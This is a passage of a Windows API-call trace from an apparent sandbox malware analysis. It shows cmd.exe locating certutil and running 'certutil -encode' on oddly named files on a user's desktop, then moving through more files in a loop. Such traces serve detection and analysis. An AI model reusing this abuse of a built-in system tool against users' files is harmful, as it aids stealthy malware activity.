0x21ed97bfc00 [0252.984] GetProcessHeap () returned 0x21ed8c70000 [0252.984] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed93b0c80 [0252.988] SetErrorMode (uMode=0x0) returned 0x0 [0252.988] SetErrorMode (uMode=0x1) returned 0x0 [0252.988] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed93b0c90, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0252.988] SetErrorMode (uMode=0x0) returned 0x1 [0252.988] GetProcessHeap () returned 0x21ed8c70000 [0252.988] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0c80, Size=0x52) returned 0x21ed93b0c80 [0252.989] GetProcessHeap () returned 0x21ed8c70000 [0252.989] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0c80) returned 0x52 [0252.989] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0252.989] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0252.989] GetProcessHeap () returned 0x21ed8c70000 [0252.989] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5e5f0 [0252.989] GetProcessHeap () returned 0x21ed8c70000 [0252.989] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d45380 [0252.989] GetProcessHeap () returned 0x21ed8c70000 [0252.989] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45380, Size=0x1be) returned 0x21ed8d45380 [0252.989] GetProcessHeap () returned 0x21ed8c70000 [0252.989] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45380) returned 0x1be [0252.989] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0252.989] GetProcessHeap () returned 0x21ed8c70000 [0252.989] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed9980990 [0252.989] GetProcessHeap () returned 0x21ed8c70000 [0252.989] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980990, Size=0x7e) returned 0x21ed9980990 [0252.990] GetProcessHeap () returned 0x21ed8c70000 [0252.990] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980990) returned 0x7e [0252.990] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0252.990] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0252.993] GetLastError () returned 0x2 [0252.993] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0252.993] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0252.994] GetLastError () returned 0x2 [0252.994] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0252.995] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d060 [0252.995] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0252.995] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0252.995] GetLastError () returned 0x2 [0252.996] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0252.996] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0252.996] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0252.996] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0252.996] ??_V@YAXPEAX@Z () returned 0x1 [0252.996] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0253.065] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0253.065] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0253.065] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0253.065] GetProcessHeap () returned 0x21ed8c70000 [0253.065] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45d10 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0253.066] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0253.067] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0253.068] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0253.068] GetProcessHeap () returned 0x21ed8c70000 [0253.068] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45d10) returned 1 [0253.068] GetProcessHeap () returned 0x21ed8c70000 [0253.068] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95a60 [0253.068] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0253.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0253.068] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0253.138] _get_osfhandle (_FileHandle=0) returned 0x4c [0253.138] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0253.209] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"sOzzAEtr.flv.Sister\" \"sOzzAEtr.flv.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"sOzzAEtr.flv.Sister\" \"sOzzAEtr.flv.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"sOzzAEtr.flv.Sister\" \"sOzzAEtr.flv.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x1004, dwThreadId=0x1168)) returned 1 [0253.229] CloseHandle (hObject=0xa8) returned 1 [0253.229] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0253.229] GetProcessHeap () returned 0x21ed8c70000 [0253.229] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0253.229] GetEnvironmentStringsW () returned 0x21ed93b0130* [0253.229] GetProcessHeap () returned 0x21ed8c70000 [0253.229] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0253.229] FreeEnvironmentStringsA (penv="=") returned 1 [0253.230] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0255.242] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0255.242] CloseHandle (hObject=0xa4) returned 1 [0255.242] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0255.242] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0255.242] GetProcessHeap () returned 0x21ed8c70000 [0255.243] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0255.243] GetEnvironmentStringsW () returned 0x21ed8d44660* [0255.243] GetProcessHeap () returned 0x21ed8c70000 [0255.243] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0255.243] FreeEnvironmentStringsA (penv="=") returned 1 [0255.243] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0255.243] GetProcessHeap () returned 0x21ed8c70000 [0255.243] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0255.243] GetEnvironmentStringsW () returned 0x21ed93b0130* [0255.243] GetProcessHeap () returned 0x21ed8c70000 [0255.243] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0255.243] FreeEnvironmentStringsA (penv="=") returned 1 [0255.243] GetProcessHeap () returned 0x21ed8c70000 [0255.243] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95a60) returned 1 [0255.243] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0255.244] ??_V@YAXPEAX@Z () returned 0x1 [0255.244] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe16fce60, ftCreationTime.dwHighDateTime=0x1d5ebd5, ftLastAccessTime.dwLowDateTime=0x77a4ab20, ftLastAccessTime.dwHighDateTime=0x1d5e227, ftLastWriteTime.dwLowDateTime=0x77a4ab20, ftLastWriteTime.dwHighDateTime=0x1d5e227, nFileSizeHigh=0x0, nFileSizeLow=0x27eb, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="t2RoafwhrVeC_4Hu.gif.Sister", cAlternateFileName="")) returned 1 [0255.244] GetProcessHeap () returned 0x21ed8c70000 [0255.244] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc8070, Size=0x54a) returned 0x21ed93b0130 [0255.247] GetProcessHeap () returned 0x21ed8c70000 [0255.247] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0130) returned 0x54a [0255.250] GetProcessHeap () returned 0x21ed8c70000 [0255.250] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d6a6a0 [0255.250] GetProcessHeap () returned 0x21ed8c70000 [0255.250] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a6a0, Size=0x58) returned 0x21ed8d6a6a0 [0255.250] GetProcessHeap () returned 0x21ed8c70000 [0255.250] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6a6a0) returned 0x58 [0255.250] GetProcessHeap () returned 0x21ed8c70000 [0255.250] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d6a710 [0255.250] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0255.251] GetProcessHeap () returned 0x21ed8c70000 [0255.251] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8cc72e0 [0255.251] ??_V@YAXPEAX@Z () returned 0x1 [0255.251] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0255.251] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0255.251] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0255.252] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cee0 [0255.252] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0255.252] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc260975a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xc260975a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0255.252] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0255.252] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\t2RoafwhrVeC_4Hu.gif.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe16fce60, ftCreationTime.dwHighDateTime=0x1d5ebd5, ftLastAccessTime.dwLowDateTime=0x77a4ab20, ftLastAccessTime.dwHighDateTime=0x1d5e227, ftLastWriteTime.dwLowDateTime=0x77a4ab20, ftLastWriteTime.dwHighDateTime=0x1d5e227, nFileSizeHigh=0x0, nFileSizeLow=0x27eb, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="t2RoafwhrVeC_4Hu.gif.Sister", cAlternateFileName="T2ROAF~1.SIS")) returned 0x21ed8c7cb80 [0255.252] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0255.253] _wcsnicmp (_String1="T2ROAF~1.SIS", _String2="t2RoafwhrVeC_4Hu.gif.Sister", _MaxCount=0x1b) returned 7 [0255.253] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0255.253] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0255.253] GetProcessHeap () returned 0x21ed8c70000 [0255.253] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8cc7420 [0255.253] ??_V@YAXPEAX@Z () returned 0x1 [0255.253] ??_V@YAXPEAX@Z () returned 0x1 [0255.253] GetProcessHeap () returned 0x21ed8c70000 [0255.253] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a710, Size=0x230) returned 0x21ed8d6a710 [0255.253] GetProcessHeap () returned 0x21ed8c70000 [0255.253] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6a710) returned 0x230 [0255.253] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0255.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0255.253] GetFileType (hFile=0x50) returned 0x2 [0255.253] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0255.254] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0255.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0255.259] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0255.271] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0255.271] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0255.271] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0255.271] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0255.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0255.271] GetFileType (hFile=0x50) returned 0x2 [0255.271] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0255.271] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0255.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0255.316] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0255.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0255.321] GetFileType (hFile=0x50) returned 0x2 [0255.321] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0255.321] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0255.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0255.322] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d6a6b0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d6a6b0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0255.324] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"t2RoafwhrVeC_4Hu.gif.Sister\" \"t2RoafwhrVeC_4Hu.gif.Cruel\" ") returned 68 [0255.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0255.324] GetFileType (hFile=0x50) returned 0x2 [0255.324] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0255.324] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0255.337] _get_osfhandle (_FileHandle=1) returned 0x50 [0255.337] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x44, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x44) returned 1 [0255.344] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0255.344] _get_osfhandle (_FileHandle=1) returned 0x50 [0255.344] GetFileType (hFile=0x50) returned 0x2 [0255.344] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0255.344] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0255.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0255.349] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0255.360] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0255.455] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0255.455] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0255.455] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0255.455] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0255.456] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0255.456] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0255.456] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0255.456] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0255.456] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0255.456] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0255.456] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0255.456] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0255.456] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0255.456] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0255.456] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0255.456] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0255.456] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0255.456] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0255.456] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0255.456] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0255.456] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0255.456] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0255.456] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0255.456] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0255.456] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0255.456] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0255.456] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0255.456] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0255.456] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0255.457] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0255.457] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0255.457] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0255.457] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0255.457] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0255.457] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0255.457] 